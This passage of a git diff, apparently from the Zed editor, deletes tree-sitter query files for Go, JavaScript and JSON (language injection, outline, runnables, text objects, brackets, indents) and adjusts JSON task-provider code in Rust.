injection.language "lua") -) - -; INJECT BASH -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (composite_literal - body: (literal_value - (keyed_element - (comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )))) - - (expression_statement - (call_expression - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ))) - ] - (#match? @_comment "^\\/\\*\\s*bash\\s*\\*\\/") ; /* bash */ or /*bash*/ - (#set! 
injection.language "bash") -) - -; INJECT CSV -( - [ - (const_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (var_spec - name: (identifier) - "=" - (comment) @_comment - value: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (assignment_statement - left: (expression_list) - "=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (short_var_declaration - left: (expression_list) - ":=" - (comment) @_comment - right: (expression_list - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - ((comment) @_comment - value: (literal_element - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - )) - - (argument_list - (comment) @_comment - [ - (interpreted_string_literal (interpreted_string_literal_content) @injection.content) - (raw_string_literal (raw_string_literal_content) @injection.content) - ] - ) - ] - (#match? @_comment "^\\/\\*\\s*csv\\s*\\*\\/") ; /* csv */ or /*csv */ - (#set! 
injection.language "csv") -) diff --git a/crates/languages/src/go/outline.scm b/crates/languages/src/go/outline.scm deleted file mode 100644 index c745f55aff7dcd4b3bfd802884db7a985c1387fa..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/outline.scm +++ /dev/null @@ -1,67 +0,0 @@ -(comment) @annotation - -(type_declaration - "type" @context - [ - (type_spec - name: (_) @name) @item - ( - "(" - (type_spec - name: (_) @name) @item - ")" - ) - ] -) - -(function_declaration - "func" @context - name: (identifier) @name - parameters: (parameter_list - "(" - ")")) @item - -(method_declaration - "func" @context - receiver: (parameter_list - "(" @context - (parameter_declaration - name: (_) @context - type: (_) @context) - ")" @context) - name: (field_identifier) @name - parameters: (parameter_list - "(" - ")")) @item - -(const_declaration - "const" @context - (const_spec - name: (identifier) @name) @item) - -(source_file - (var_declaration - "var" @context - [ - ; The declaration may define multiple variables, and so @item is on - ; the identifier so they get distinct ranges. - (var_spec - name: (identifier) @name @item) - (var_spec_list - (var_spec - name: (identifier) @name @item) - ) - ] - ) -) - -(method_elem - name: (_) @name - parameters: (parameter_list - "(" @context - ")" @context)) @item - -; Fields declarations may define multiple fields, and so @item is on the -; declarator so they each get distinct ranges. -(field_declaration - name: (_) @name @item) diff --git a/crates/languages/src/go/runnables.scm b/crates/languages/src/go/runnables.scm deleted file mode 100644 index 786a923566d433f20b042178df2609e993e6da15..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/runnables.scm +++ /dev/null @@ -1,307 +0,0 @@ -; Functions names start with `Test` -( - ( - (function_declaration name: (_) @run - (#match? @run "^Test.*") - (#not-match? @run "^TestMain$")) - ) @_ - (#set! 
tag go-test) -) - -; Suite test methods (testify/suite) -( - (method_declaration - receiver: (parameter_list - (parameter_declaration - type: [ - (pointer_type (type_identifier) @_suite_name) - (type_identifier) @_suite_name - ] - ) - ) - name: (field_identifier) @run @_subtest_name - (#match? @_subtest_name "^Test.*") - (#match? @_suite_name ".*Suite") - ) @_ - (#set! tag go-testify-suite) -) - -; `go:generate` comments -( - ((comment) @_comment @run - (#match? @_comment "^//go:generate")) - (#set! tag go-generate) -) - -; `t.Run` -( - ( - (call_expression - function: ( - selector_expression - field: _ @run @_name - (#eq? @_name "Run") - ) - arguments: ( - argument_list - . - [ - (interpreted_string_literal) - (raw_string_literal) - ] @_subtest_name - . - (func_literal - parameters: ( - parameter_list - (parameter_declaration - name: (identifier) @_param_name - type: (pointer_type - (qualified_type - package: (package_identifier) @_pkg - name: (type_identifier) @_type - (#eq? @_pkg "testing") - (#eq? @_type "T") - ) - ) - ) - ) - ) @_second_argument - ) - ) - ) @_ - (#set! tag go-subtest) -) - -; Functions names start with `Example` -( - ( - (function_declaration name: (_) @run @_name - (#match? @_name "^Example.*")) - ) @_ - (#set! tag go-example) -) - -; Functions names start with `Benchmark` -( - ( - (function_declaration name: (_) @run @_name - (#match? @_name "^Benchmark.*")) - ) @_ - (#set! tag go-benchmark) -) - -; Functions names start with `Fuzz` -( - ( - (function_declaration name: (_) @run @_name - (#match? @_name "^Fuzz")) - ) @_ - (#set! tag go-fuzz) -) - -; go run -( - ( - (function_declaration name: (_) @run - (#eq? @run "main")) - ) @_ - (#set! tag go-main) -) - -; Table test cases - slice and map with explicit variable -( - (short_var_declaration - left: (expression_list (identifier) @_collection_var) - right: (expression_list - (composite_literal - type: [ - (slice_type) - (map_type - key: (type_identifier) @_key_type - (#eq? 
@_key_type "string") - ) - ] - body: (literal_value - [ - (literal_element - (literal_value - (keyed_element - (literal_element - (identifier) @_field_name - ) - (literal_element - [ - (interpreted_string_literal) @run @_table_test_case_name - (raw_string_literal) @run @_table_test_case_name - ] - ) - ) - ) - ) - (keyed_element - (literal_element - [ - (interpreted_string_literal) @run @_table_test_case_name - (raw_string_literal) @run @_table_test_case_name - ] - ) - ) - ] - ) - ) - ) - ) - (for_statement - (range_clause - left: (expression_list - [ - ( - (identifier) - (identifier) @_loop_var_inner - ) - (identifier) @_loop_var_outer - ] - ) - right: (identifier) @_range_var - (#eq? @_range_var @_collection_var) - ) - body: (block - (statement_list - (expression_statement - (call_expression - function: (selector_expression - operand: (identifier) - field: (field_identifier) @_run_method - (#eq? @_run_method "Run") - ) - arguments: (argument_list - . - [ - (selector_expression - operand: (identifier) @_tc_var - (#eq? @_tc_var @_loop_var_inner) - field: (field_identifier) @_field_check - (#eq? @_field_check @_field_name) - ) - (identifier) @_arg_var - (#eq? @_arg_var @_loop_var_outer) - ] - . - (func_literal - parameters: (parameter_list - (parameter_declaration - type: (pointer_type - (qualified_type - package: (package_identifier) @_pkg - name: (type_identifier) @_type - (#eq? @_pkg "testing") - (#eq? @_type "T") - ) - ) - ) - ) - ) - ) - ) - ) - ) - ) - ) @_ - (#set! tag go-table-test-case) -) - -; Table test cases - slice and map declared right inside the loop without -; explicit variable -( - (for_statement - (range_clause - left: (expression_list - [ - ( - (identifier) - (identifier) @_loop_var_inner - ) - (identifier) @_loop_var_outer - ] - ) - right: (composite_literal - type: [ - (slice_type) - (map_type - key: (type_identifier) @_key_type - (#eq? 
@_key_type "string") - ) - ] - body: (literal_value - [ - (literal_element - (literal_value - (keyed_element - (literal_element - (identifier) @_field_name - ) - (literal_element - [ - (interpreted_string_literal) @run @_table_test_case_name - (raw_string_literal) @run @_table_test_case_name - ] - ) - ) - ) - ) - (keyed_element - (literal_element - [ - (interpreted_string_literal) @run @_table_test_case_name - (raw_string_literal) @run @_table_test_case_name - ] - ) - ) - ] - ) - ) - ) - body: (block - (statement_list - (expression_statement - (call_expression - function: (selector_expression - operand: (identifier) - field: (field_identifier) @_run_method - (#eq? @_run_method "Run") - ) - arguments: (argument_list - . - [ - (selector_expression - operand: (identifier) @_tc_var - (#eq? @_tc_var @_loop_var_inner) - field: (field_identifier) @_field_check - (#eq? @_field_check @_field_name) - ) - (identifier) @_arg_var - (#eq? @_arg_var @_loop_var_outer) - ] - . - (func_literal - parameters: (parameter_list - (parameter_declaration - type: (pointer_type - (qualified_type - package: (package_identifier) @_pkg - name: (type_identifier) @_type - (#eq? @_pkg "testing") - (#eq? @_type "T") - ) - ) - ) - ) - ) - ) - ) - ) - ) - ) - ) @_ - (#set! 
tag go-table-test-case-without-explicit-variable) -) diff --git a/crates/languages/src/go/textobjects.scm b/crates/languages/src/go/textobjects.scm deleted file mode 100644 index eb4f3a00501021167c3c2b9136d5cef2f131878f..0000000000000000000000000000000000000000 --- a/crates/languages/src/go/textobjects.scm +++ /dev/null @@ -1,25 +0,0 @@ -(function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(method_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(type_declaration - (type_spec (struct_type (field_declaration_list ( - "{" - (_)* @class.inside - "}")?)))) @class.around - -(type_declaration - (type_spec (interface_type - (_)* @class.inside))) @class.around - -(type_declaration) @class.around - -(comment)+ @comment.around diff --git a/crates/languages/src/gomod/injections.scm b/crates/languages/src/gomod/injections.scm deleted file mode 100644 index 321c90add3710f35721daeb6b42abe38af094953..0000000000000000000000000000000000000000 --- a/crates/languages/src/gomod/injections.scm +++ /dev/null @@ -1,2 +0,0 @@ -((comment) @injection.content - (#set! 
injection.language "comment")) diff --git a/crates/languages/src/gomod/structure.scm b/crates/languages/src/gomod/structure.scm deleted file mode 100644 index ce1bc9aa3ee0b1f77086103bad91825b5927005f..0000000000000000000000000000000000000000 --- a/crates/languages/src/gomod/structure.scm +++ /dev/null @@ -1,35 +0,0 @@ -(require_directive - "require" @structure.anchor - ("(") @structure.open - (")") @structure.close -) - -(exclude_directive - "exclude" @structure.anchor - ("(") @structure.open - (")") @structure.close -) - -(module_directive - "module" @structure.anchor - ("(") @structure.open - (")") @structure.close -) - -(replace_directive - "replace" @structure.anchor - ("(") @structure.open - (")") @structure.close -) - -(retract_directive - "retract" @structure.anchor - ("(") @structure.open - (")") @structure.close -) - -(ignore_directive - "ignore" @structure.anchor - ("(") @structure.open - (")") @structure.close -) diff --git a/crates/languages/src/gowork/injections.scm b/crates/languages/src/gowork/injections.scm deleted file mode 100644 index 321c90add3710f35721daeb6b42abe38af094953..0000000000000000000000000000000000000000 --- a/crates/languages/src/gowork/injections.scm +++ /dev/null @@ -1,2 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment")) diff --git a/crates/languages/src/javascript/brackets.scm b/crates/languages/src/javascript/brackets.scm deleted file mode 100644 index a16a6432692ec7b9e0e3d24151cb814fc11bd83d..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/brackets.scm +++ /dev/null @@ -1,9 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -("<" @open ">" @close) -("<" @open "/>" @close) -("" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/javascript/debugger.scm b/crates/languages/src/javascript/debugger.scm deleted file mode 100644 index a99f194a4a4130210b47f8170fca039acc163411..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/debugger.scm +++ /dev/null @@ -1,23 +0,0 @@ -(lexical_declaration (variable_declarator name: (identifier) @debug-variable)) - -(for_in_statement left: (identifier) @debug-variable) -(for_statement initializer: (lexical_declaration (variable_declarator name: (identifier) @debug-variable))) - -(binary_expression left: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(binary_expression right: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(unary_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(update_expression argument: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(return_statement (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(parenthesized_expression (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(array (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(pair value: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(member_expression object: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(statement_block) @debug-scope -(program) @debug-scope diff --git a/crates/languages/src/javascript/imports.scm b/crates/languages/src/javascript/imports.scm deleted file mode 100644 index e26b97aeef9cb62395e7030f3173208d79187bd6..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/imports.scm +++ /dev/null @@ -1,14 +0,0 @@ -(import_statement - import_clause: (import_clause - [ - (identifier) @name - (named_imports - (import_specifier - name: (_) @name - alias: (_)? 
@alias)) - ]) - source: (string (string_fragment) @source)) @import - -(import_statement - !import_clause - source: (string (string_fragment) @source @wildcard)) @import diff --git a/crates/languages/src/javascript/indents.scm b/crates/languages/src/javascript/indents.scm deleted file mode 100644 index 9897f3060eaf37891cf4563cebc93345112422f8..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/indents.scm +++ /dev/null @@ -1,21 +0,0 @@ -[ - (call_expression) - (assignment_expression) - (member_expression) - (lexical_declaration) - (variable_declaration) - (assignment_expression) - (if_statement) - (for_statement) -] @indent - -(_ "[" "]" @end) @indent -(_ "<" ">" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent - -(jsx_opening_element ">" @end) @indent - -(jsx_element - (jsx_opening_element) @start - (jsx_closing_element)? @end) @indent diff --git a/crates/languages/src/javascript/injections.scm b/crates/languages/src/javascript/injections.scm deleted file mode 100644 index 244e025a6f5d62f1d3500fc35fc480b1baa2471e..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/injections.scm +++ /dev/null @@ -1,128 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) - -(((comment) @_jsdoc_comment - (#match? @_jsdoc_comment "(?s)^/[*][*][^*].*[*]/$")) @injection.content - (#set! injection.language "jsdoc")) - -((regex) @injection.content - (#set! injection.language "regex")) - -(call_expression - function: (identifier) @_name (#eq? @_name "css") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (member_expression - object: (identifier) @_obj (#eq? @_obj "styled") - property: (property_identifier)) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (call_expression - function: (identifier) @_name (#eq? 
@_name "styled")) - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "css")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "html") - arguments: (template_string) @injection.content - (#set! injection.language "html") -) - -(call_expression - function: (identifier) @_name (#eq? @_name "js") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "javascript")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "json") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "json")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "sql") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "sql")) -) - -(call_expression - function: (identifier) @_name (#eq? @_name "ts") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "typescript")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^ya?ml$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "yaml")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^g(raph)?ql$") - arguments: (template_string (string_fragment) @injection.content - (#set! injection.language "graphql")) -) - -(call_expression - function: (identifier) @_name (#match? @_name "^g(raph)?ql$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! injection.language "graphql"))) -) - -(call_expression - function: (identifier) @_name(#match? @_name "^iso$") - arguments: (arguments (template_string (string_fragment) @injection.content - (#set! 
injection.language "isograph"))) -) - -; Parse the contents of strings and tagged template -; literals with leading ECMAScript comments: -; '/* html */' or '/*html*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*html\\s*\\*\\/") - (#set! injection.language "html") -) - -; '/* sql */' or '/*sql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*sql\\s*\\*\\/") - (#set! injection.language "sql") -) - -; '/* gql */' or '/*gql*/' -; '/* graphql */' or '/*graphql*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(gql|graphql)\\s*\\*\\/") - (#set! injection.language "graphql") -) - -; '/* css */' or '/*css*/' -( - ((comment) @_ecma_comment [ - (string (string_fragment) @injection.content) - (template_string (string_fragment) @injection.content) - ]) - (#match? @_ecma_comment "^\\/\\*\\s*(css)\\s*\\*\\/") - (#set! injection.language "css") -) diff --git a/crates/languages/src/javascript/outline.scm b/crates/languages/src/javascript/outline.scm deleted file mode 100644 index 5f72103bc63bdfab73f7b858c01abe8d34317b22..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/outline.scm +++ /dev/null @@ -1,223 +0,0 @@ -(internal_module - "namespace" @context - name: (_) @name) @item - -(enum_declaration - "enum" @context - name: (_) @name) @item - -(function_declaration - "async"? @context - "function" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(generator_function_declaration - "async"? 
@context - "function" @context - "*" @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item - -(interface_declaration - "interface" @context - name: (_) @name) @item - -(program - (export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item))) - -; Exported array destructuring -(program - (export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ]))))) - -; Exported object destructuring -(program - (export_statement - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)]))))) - -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Top-level array destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Top-level object destructuring -(program - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern - value: (identifier) @name @item) - (pair_pattern - value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(class_declaration - "class" @context - name: (_) @name) @item - -; Method definitions in classes (not in object literals) -(class_body - (method_definition - [ - "get" - "set" - 
"async" - "*" - "readonly" - "static" - (override_modifier) - (accessibility_modifier) - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item) - -; Object literal methods -(variable_declarator - value: (object - (method_definition - [ - "get" - "set" - "async" - "*" - ]* @context - name: (_) @name - parameters: (formal_parameters - "(" @context - ")" @context)) @item)) - -(public_field_definition - [ - "declare" - "readonly" - "abstract" - "static" - (accessibility_modifier) - ]* @context - name: (_) @name) @item - -; Add support for (node:test, bun:test and Jest) runnable -( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] @context - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . [ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#eq? @_property "each") - ) - arguments: ( - arguments . 
[ - (string (string_fragment) @name) - (identifier) @name - ] - ) - ) -) @item - -; Object properties -(pair - key: [ - (property_identifier) @name - (string (string_fragment) @name) - (number) @name - (computed_property_name) @name - ]) @item - -; Nested variables in function bodies -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (identifier) @name) @item)) - -; Nested array destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (array_pattern - [ - (identifier) @name @item - (assignment_pattern left: (identifier) @name @item) - (rest_pattern (identifier) @name @item) - ])))) - -; Nested object destructuring in functions -(statement_block - (lexical_declaration - ["let" "const"] @context - (variable_declarator - name: (object_pattern - [(shorthand_property_identifier_pattern) @name @item - (pair_pattern value: (identifier) @name @item) - (pair_pattern value: (assignment_pattern left: (identifier) @name @item)) - (rest_pattern (identifier) @name @item)])))) - -(comment) @annotation diff --git a/crates/languages/src/javascript/runnables.scm b/crates/languages/src/javascript/runnables.scm deleted file mode 100644 index c64aacb50e286b1aeeb1231f2745d4d5923a7c1d..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/runnables.scm +++ /dev/null @@ -1,46 +0,0 @@ -; Add support for (node:test, bun:test and Jest) runnable -; Function expression that has `it`, `test` or `describe` as the function name -( - (call_expression - function: [ - (identifier) @_name - (member_expression - object: [ - (identifier) @_name - (member_expression object: (identifier) @_name) - ] - ) - ] - (#any-of? @_name "it" "test" "describe" "context" "suite") - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! 
tag js-test) -) - -; Add support for parameterized tests -( - (call_expression - function: (call_expression - function: (member_expression - object: [(identifier) @_name (member_expression object: (identifier) @_name)] - property: (property_identifier) @_property - ) - (#any-of? @_name "it" "test" "describe" "context" "suite") - (#eq? @_property "each") - ) - arguments: ( - arguments . [ - (string (string_fragment) @run) - (identifier) @run - ] - ) - ) @_js-test - - (#set! tag js-test) -) diff --git a/crates/languages/src/javascript/textobjects.scm b/crates/languages/src/javascript/textobjects.scm deleted file mode 100644 index eace658e6b9847bcc651deedad2bc27cbfbf6975..0000000000000000000000000000000000000000 --- a/crates/languages/src/javascript/textobjects.scm +++ /dev/null @@ -1,85 +0,0 @@ -(comment)+ @comment.around - -(function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(method_definition - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(function_expression - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -((arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")) @function.around - (#not-has-parent? 
@function.around variable_declarator)) - -; Arrow function in variable declaration - capture the full declaration -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) -]) @function.around - -; Arrow function in variable declaration (captures body for expression-bodied arrows) -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) -]) @function.around - -; Catch-all for arrow functions in other contexts (callbacks, etc.) -((arrow_function - body: (_) @function.inside) @function.around - (#not-has-parent? @function.around variable_declarator)) - -(generator_function - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(generator_function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(class_declaration - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(class - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around diff --git a/crates/languages/src/jsdoc/brackets.scm b/crates/languages/src/jsdoc/brackets.scm deleted file mode 100644 index 0e1bf5ca191bf7a319e2bcad6673d5cf0401380c..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsdoc/brackets.scm +++ /dev/null @@ -1,2 +0,0 @@ -("[" @open "]" @close) -("{" @open "}" @close) diff --git a/crates/languages/src/json.rs b/crates/languages/src/json.rs index b6c3954cf228d90714a5eb5676d86a204b47b88d..de30d958d006016a118f2db077e38c1212f4f683 100644 --- a/crates/languages/src/json.rs +++ b/crates/languages/src/json.rs @@ -4,10 +4,10 @@ use async_tar::Archive; use async_trait::async_trait; use collections::HashMap; use futures::StreamExt; -use gpui::{App, 
AsyncApp, Task}; +use gpui::{App, AsyncApp, Entity, Task}; use http_client::github::{GitHubLspBinaryVersion, latest_github_release}; use language::{ - ContextProvider, LanguageName, LanguageRegistry, LocalFile as _, LspAdapter, + Buffer, ContextProvider, LanguageName, LanguageRegistry, LocalFile as _, LspAdapter, LspAdapterDelegate, LspInstaller, Toolchain, }; use lsp::{LanguageServerBinary, LanguageServerName, Uri}; @@ -44,10 +44,11 @@ pub(crate) struct JsonTaskProvider; impl ContextProvider for JsonTaskProvider { fn associated_tasks( &self, - file: Option>, + buffer: Option>, cx: &App, ) -> gpui::Task> { - let Some(file) = project::File::from_dyn(file.as_ref()).cloned() else { + let file = buffer.as_ref().and_then(|buf| buf.read(cx).file()); + let Some(file) = project::File::from_dyn(file).cloned() else { return Task::ready(None); }; let is_package_json = file.path.ends_with(RelPath::unix("package.json").unwrap()); @@ -245,6 +246,7 @@ impl LspAdapter for JsonLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { Ok(Some(json!({ "provideFormatter": true diff --git a/crates/languages/src/json/brackets.scm b/crates/languages/src/json/brackets.scm deleted file mode 100644 index cd5cdf328b3a04730d56ec0cb06c3802fe07c978..0000000000000000000000000000000000000000 --- a/crates/languages/src/json/brackets.scm +++ /dev/null @@ -1,3 +0,0 @@ -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! 
rainbow.exclude)) diff --git a/crates/languages/src/json/indents.scm b/crates/languages/src/json/indents.scm deleted file mode 100644 index b7b2a2e7670f324730a64e15f1f59f37ac126270..0000000000000000000000000000000000000000 --- a/crates/languages/src/json/indents.scm +++ /dev/null @@ -1,2 +0,0 @@ -(array "]" @end) @indent -(object "}" @end) @indent diff --git a/crates/languages/src/json/outline.scm b/crates/languages/src/json/outline.scm deleted file mode 100644 index 43e2743478b27e4430bf3ddf82e49023d3bad584..0000000000000000000000000000000000000000 --- a/crates/languages/src/json/outline.scm +++ /dev/null @@ -1,2 +0,0 @@ -(pair - key: (string (string_content) @name)) @item diff --git a/crates/languages/src/json/redactions.scm b/crates/languages/src/json/redactions.scm deleted file mode 100644 index 7359637244ac5892c0d57b41e2ef11652a3d0890..0000000000000000000000000000000000000000 --- a/crates/languages/src/json/redactions.scm +++ /dev/null @@ -1,4 +0,0 @@ -(pair value: (number) @redact) -(pair value: (string) @redact) -(array (number) @redact) -(array (string) @redact) diff --git a/crates/languages/src/json/runnables.scm b/crates/languages/src/json/runnables.scm deleted file mode 100644 index 2396f05a5722f422f46fda8bb09e8b4e25bdb794..0000000000000000000000000000000000000000 --- a/crates/languages/src/json/runnables.scm +++ /dev/null @@ -1,21 +0,0 @@ -; Add support `package.json` and `composer.json` script runnable - -( - (document - (object - (pair - key: (string - (string_content) @_name - (#eq? @_name "scripts") - ) - value: (object - (pair - key: (string (string_content) @run @script) - ) - ) - ) - ) - ) - (#set! tag package-script) - (#set! 
tag composer-script) -) diff --git a/crates/languages/src/jsonc/brackets.scm b/crates/languages/src/jsonc/brackets.scm deleted file mode 100644 index cd5cdf328b3a04730d56ec0cb06c3802fe07c978..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsonc/brackets.scm +++ /dev/null @@ -1,3 +0,0 @@ -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/jsonc/indents.scm b/crates/languages/src/jsonc/indents.scm deleted file mode 100644 index b7b2a2e7670f324730a64e15f1f59f37ac126270..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsonc/indents.scm +++ /dev/null @@ -1,2 +0,0 @@ -(array "]" @end) @indent -(object "}" @end) @indent diff --git a/crates/languages/src/jsonc/injections.scm b/crates/languages/src/jsonc/injections.scm deleted file mode 100644 index 01e833d1e31d480b66a558bdfb8f07b2f0cdbc46..0000000000000000000000000000000000000000 --- a/crates/languages/src/jsonc/injections.scm +++ /dev/null @@ -1,2 +0,0 @@ -((comment) @injection.content - (#set! 
